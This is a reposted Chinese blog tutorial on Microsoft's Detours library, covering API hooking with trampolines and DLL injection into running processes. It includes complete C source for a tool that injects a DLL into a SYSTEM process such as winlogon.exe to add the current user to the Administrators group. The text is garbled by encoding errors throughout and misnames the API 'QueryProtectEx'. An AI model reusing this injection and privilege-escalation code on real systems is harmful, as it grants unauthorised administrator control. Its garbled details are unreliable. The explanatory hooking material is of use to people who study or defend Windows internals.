国产精品视频精品,欧美日韩综合在线,久久久噜噜噜久久

關(guān)于Detours[轉(zhuǎn)]

Detours是微軟開發(fā)的一個(gè)函數(shù)庫（源代碼可在http://research.microsoft.com/sn/detours 免費(fèi)獲得）, 用于修改運(yùn)行中的程序在內(nèi)存中的影像，從而即使沒有源代碼也能改變程序的行為。具體用途是：

攔截WIN32 API調(diào)用，將其引導(dǎo)到自己的子程序，從而實(shí)現(xiàn)WIN32 API的定制。
為一個(gè)已在運(yùn)行的進(jìn)程創(chuàng)建一新線程，裝入自己的代碼并運(yùn)行。
本文將簡介Detours的原理，Detours庫函數(shù)的用法，并利用Detours庫函數(shù)在Windows NT上編寫了一個(gè)程序，該程序能使有“調(diào)試程序”的用戶權(quán)限的用戶成為系統(tǒng)管理員，附錄利用Detours庫函數(shù)修改該程序使普通用戶即可成為系統(tǒng)管理員（在NT4 SP3上）。

一． Detours的原理

1． WIN32進(jìn)程的內(nèi)存管理

總所周知，WINDOWS NT實(shí)現(xiàn)了虛擬存儲(chǔ)器，每一WIN32進(jìn)程擁有4GB的虛存空間，關(guān)于WIN32進(jìn)程的虛存結(jié)構(gòu)及其操作的具體細(xì)節(jié)請(qǐng)參閱WIN32 API手冊(cè)，以下僅指出與Detours相關(guān)的幾點(diǎn)：

(1) 進(jìn)程要執(zhí)行的指令也放在虛存空間中
(2) 可以使用QueryProtectEx函數(shù)把存放指令的頁面的權(quán)限更改為可讀可寫可執(zhí)行，再改寫其內(nèi)容，從而修改正在運(yùn)行的程序
(3) 可以使用VirtualAllocEx從一個(gè)進(jìn)程為另一正運(yùn)行的進(jìn)程分配虛存，再使用 QueryProtectEx函數(shù)把頁面的權(quán)限更改為可讀可寫可執(zhí)行，并把要執(zhí)行的指令以二進(jìn)制機(jī)器碼的形式寫入，從而為一個(gè)正在運(yùn)行的進(jìn)程注入任意的代碼

2．攔截WIN32 API的原理

Detours定義了三個(gè)概念：

(1) Target函數(shù)：要攔截的函數(shù)，通常為Windows的API。
(2) Trampoline函數(shù)：Target函數(shù)的復(fù)制品。因?yàn)镈etours將會(huì)改寫Target函數(shù)，所以先把Target函數(shù)復(fù)制保存好，一方面仍然保存Target函數(shù)的過程調(diào)用語義，另一方面便于以后的恢復(fù)。
(3) Detour 函數(shù)：用來替代Target函數(shù)的函數(shù)。

Detours在Target函數(shù)的開頭加入JMP Address_of_ Detour_ Function指令（共5個(gè)字節(jié)）把對(duì)Target函數(shù)的調(diào)用引導(dǎo)到自己的Detour函數(shù)，把Target函數(shù)的開頭的5個(gè)字節(jié)加上JMP Address_of_ Target _ Function+5作為Trampoline函數(shù)。例子如下：

攔截前：Target _ Function：
；Target函數(shù)入口，以下為假想的常見的子程序入口代碼
push   ebp
mov   ebp,   esp
push   eax
push   ebx
Trampoline:
；以下是Target函數(shù)的繼續(xù)部分
……

攔截后： Target _ Function：
jmp   Detour_Function
Trampoline:
；以下是Target函數(shù)的繼續(xù)部分
……

Trampoline_Function:
; Trampoline函數(shù)入口, 開頭的5個(gè)字節(jié)與Target函數(shù)相同
push   ebp
mov   ebp,   esp
push   eax
push   ebx
；跳回去繼續(xù)執(zhí)行Target函數(shù)
jmp   Target_Function+5
3．為一個(gè)已在運(yùn)行的進(jìn)程裝入一個(gè)DLL

以下是其步驟：

(1) 創(chuàng)建一個(gè)ThreadFuction，內(nèi)容僅是調(diào)用LoadLibrary。
(2) 用VirtualAllocEx為一個(gè)已在運(yùn)行的進(jìn)程分配一片虛存，并把權(quán)限更改為可讀可寫可執(zhí)行。
(3) 把ThreadFuction的二進(jìn)制機(jī)器碼寫入這片虛存。
(4) 用CreateRemoteThread在該進(jìn)程上創(chuàng)建一個(gè)線程，傳入前面分配的虛存的起始地址作為線程函數(shù)的地址，即可為一個(gè)已在運(yùn)行的進(jìn)程裝入一個(gè)DLL。通過DllMain 即可在一個(gè)已在運(yùn)行的進(jìn)程中運(yùn)行自己的代碼。

二． Detours庫函數(shù)的用法

因?yàn)镈etours軟件包并沒有附帶幫助文件，以下接口僅從剖析源代碼得出。

1． PBYTE WINAPI DetourFindFunction(PCHAR pszModule, PCHAR pszFunction)

功能：從一DLL中找出一函數(shù)的入口地址
參數(shù)：pszModule是DLL名，pszFunction是函數(shù)名。
返回：名為pszModule的DLL的名為pszFunction的函數(shù)的入口地址
說明：DetourFindFunction除使用GetProcAddress外，還直接分析DLL的文件頭，因此可以找到一些GetProcAddress找不到的函數(shù)入口。

2． DETOUR_TRAMPOLINE(trampoline_prototype, target_name)
功能：該宏把名為target_name 的Target函數(shù)生成Trampoline函數(shù)，以后調(diào)用 trampoline_prototype在語義上等于調(diào)用Target函數(shù)。

3． BOOL WINAPI DetourFunctionWithTrampoline(PBYTE pbTrampoline, BYTE pbDetour)
功能：用Detour 函數(shù)攔截Target函數(shù)
參數(shù)：pbTrampoline是DETOUR_TRAMPOLINE得到的trampoline_prototype，pbDetour是 Detour 函數(shù)的入口地址。

4． BOOL WINAPI DetourRemoveWithTrampoline(PBYTE pbTrampoline,PBYTE pbDetour)
功能：恢復(fù)Target函數(shù)
參數(shù)：pbTrampoline是DETOUR_TRAMPOLINE得到的trampoline_prototype，pbDetour是 Detour 函數(shù)的入口地址。

5． BOOL WINAPI ContinueProcessWithDll(HANDLE hProcess, LPCSTR lpDllName)
功能：為一個(gè)已在運(yùn)行的進(jìn)程裝入一個(gè)DLL
參數(shù)：hProcess是進(jìn)程的句柄，lpDllName是要裝入的DLL名

三．程序?qū)嵗?br style="LINE-HEIGHT: normal">
以一個(gè)能使有“調(diào)試程序”的用戶權(quán)限的用戶成為系統(tǒng)管理員的程序做例子說明Detours 庫函數(shù)的用法。程序的設(shè)計(jì)思路是找一個(gè)以System帳號(hào)運(yùn)行的進(jìn)程，如spoolss.exe, rpcss.exe, winlogon.exe, service.exe等，使用ContinueProcessWithDll在其中注入把當(dāng)前用戶加入到 Administrators本地組的DLL，因?yàn)樵揇LL在這些進(jìn)程的安全上下文環(huán)境運(yùn)行，所以有相應(yīng)的權(quán)限。

先編寫相應(yīng)的DLL：

/*admin.dll, 當(dāng)進(jìn)程裝入時(shí)會(huì)把名為szAccountName
的用戶加入到Administrators本地組。*/

#include
#include
#include
#include

/*以下創(chuàng)建一共享段實(shí)現(xiàn)進(jìn)程間的數(shù)據(jù)通訊，
szAccountName 是用戶名，bPrepared說明
szAccountName是否已初始化。*/

#pragma data_seg(".MYSHARE")
BOOL bPrepared=FALSE;
wchar_t szAccountName[100]={0};
#pragma data_seg()

#pragma comment(linker, "/SECTION:.MYSHARE,RWS")

/*程序調(diào)用SetAccountName設(shè)置要加入到Administrators
本地組的用戶名，并通知DllMain
已初始化szAccountName ，
以后被裝入時(shí)可調(diào)用ElevatePriv */

__declspec(dllexport) VOID WINAPI
SetAccountName(wchar_t *Name)
{
    wcscpy(szAccountName,Name);
    bPrepared=TRUE;
}

/*把名為szAccountName的用戶加入
到Administrators本地組*/

__declspec(dllexport) VOID WINAPI ElevatePriv()
{
    LOCALGROUP_MEMBERS_INFO_3 account;
    account.lgrmi3_domainandname=szAccountName;
    NetLocalGroupAddMembers(NULL,L"Administrators",
        3,(LPBYTE)&account,1);
}

__declspec(dllexport) ULONG WINAPI
DllMain(HINSTANCE hInstance,
        DWORD dwReason, PVOID lpReserved)
{
    switch (dwReason) {
   case DLL_THREAD_ATTACH:
       if (bPrepared)
           ElevatePriv();
    }
    return TRUE;
}

程序如下：

/*AddMeToAdministrators.exe 把當(dāng)前用戶加入到
Administrators本地組。使用方法為：（1）
運(yùn)行任務(wù)管理器找到spoolss.exe或rpcss.exe或winlogon.exe或sevice.exe的進(jìn)程ID （2）執(zhí)行AddMeToAdministrators.exe procid, 其中procid為（1）記下的進(jìn)程ID （3）簽退再簽到，運(yùn)行用戶管理器，即可發(fā)現(xiàn)自己已在Administrators本地組中。*/

#include
#include
#include
#include
#include

extern VOID WINAPI SetAccountName(wchar_t *Name);

/* GetCurrentUser得到自己的用戶名稱*/

void GetCurrentUser(wchar_t *szName)
{
    HANDLE hProcess, hAccessToken;
    wchar_t InfoBuffer[1000],szAccountName[200],
        szDomainName[200];
    PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;
    DWORD dwInfoBufferSize,dwAccountSize = 200,
        dwDomainSize = 200;
    SID_NAME_USE snu;

    hProcess = GetCurrentProcess();

    OpenProcessToken(hProcess,TOKEN_READ,&hAccessToken);

    GetTokenInformation(hAccessToken,TokenUser,
        InfoBuffer,
        1000, &dwInfoBufferSize);

    LookupAccountSid(NULL, pTokenUser->User.Sid,
        szAccountName,
        &dwAccountSize,szDomainName, &dwDomainSize, &snu);
    wcscpy(szName,szDomainName);
    wcscat(szName,L"\");
        wcscat(szName,szAccountName);
}

/* EnablePrivilege啟用自己的“調(diào)試程序”的用戶權(quán)限*/

BOOL EnablePrivilege(LPCTSTR szPrivName,BOOL fEnable)
{
    HANDLE hToken;
    if (!OpenProcessToken(GetCurrentProcess(),
        TOKEN_ADJUST_PRIVILEGES, &hToken))
        return FALSE;
    TOKEN_PRIVILEGES tp;
    tp.PrivilegeCount = 1;
    LookupPrivilegeValue(NULL, szPrivName,
        &tp.Privileges[0].Luid);
    tp.Privileges[0].Attributes = fEnable ?
SE_PRIVILEGE_ENABLED : 0;
    AdjustTokenPrivileges(hToken, FALSE, &tp,
        sizeof(tp), NULL, NULL);
    return((GetLastError() == ERROR_SUCCESS));
}

int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hprev,
                   LPSTR lpszCmdLine, int
                   nCmdShow)
{
    INT argc;
    WCHAR **argv;
    argv = CommandLineToArgvW(GetCommandLineW(),
        &argc);
    INT nProcessId = -1;
    if (argc!=2){
        wprintf(L"usage %s pid", argv[0]);
        return 1;
    }
    nProcessId = _wtoi(argv[1]);
    printf("%d ",nProcessId);
    /*要成功執(zhí)行ContinueProcessWithDll，要對(duì)winlogon.exe等進(jìn)程的進(jìn)程句柄有讀寫存儲(chǔ)器內(nèi)容和創(chuàng)建線程的權(quán)限，EnablePrivilege使本進(jìn)程有這樣的權(quán)利。*/

    if (!EnablePrivilege(SE_DEBUG_NAME, TRUE)){
        printf("AdjustTokenPrivilege Fail %u ",
            (UINT)GetLastError());
        return 1;
    }
    HANDLE   gNewHandle =
        OpenProcess(PROCESS_ALL_ACCESS
        , TRUE, nProcessId);
    if (!gNewHandle){
        printf("OpenProcess Fail %u ",
            (UINT)GetLastError());
        return 1;
    }
    wchar_t szName[100];
    GetCurrentUser(szName);
    SetAccountName(szName);
    If (!ContinueProcessWithDll(gNewHandle,
        L"c:\temp\admin.dll")) {
            printf("ContinueProcessWithDll failed %u",
                (UINT)GetLastError());
            return 3;
    }
    return 0;
}
因?yàn)?#8220;調(diào)試程序”的用戶權(quán)限缺省情況下僅賦予給管理員，因此并不會(huì)造成安全漏洞。但該程序揭示出“調(diào)試程序”的用戶權(quán)限其實(shí)是至高無上的用戶權(quán)限，只能授予給可信用戶。

四．結(jié)論      Detours是一強(qiáng)大的工具，提供了簡單易用的函數(shù)接口來攔截WIN32 API調(diào)用和為一個(gè)已在運(yùn)行的進(jìn)程裝入一個(gè)DLL。

posted on 2010-08-29 23:08 codeArt 閱讀(638) 評(píng)論(0) 編輯收藏引用所屬分類: C++

只有注冊(cè)用戶登錄后才能發(fā)表評(píng)論。
【推薦】100%開源！大型工業(yè)跨平臺(tái)軟件C++源碼提供，建模，組態(tài)！

相關(guān)文章: RAII是什么？來源于金慶的專欄 C++的繼承關(guān)于Detours[轉(zhuǎn)]

網(wǎng)站導(dǎo)航: 博客園 IT新聞 BlogJava 博問 Chat2DB 管理

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

codeArt

關(guān)于Detours[轉(zhuǎn)]

導(dǎo)航

統(tǒng)計(jì)

常用鏈接

留言簿(1)

隨筆分類

隨筆檔案

文章檔案

編程與開源

搜索

最新評(píng)論

閱讀排行榜

評(píng)論排行榜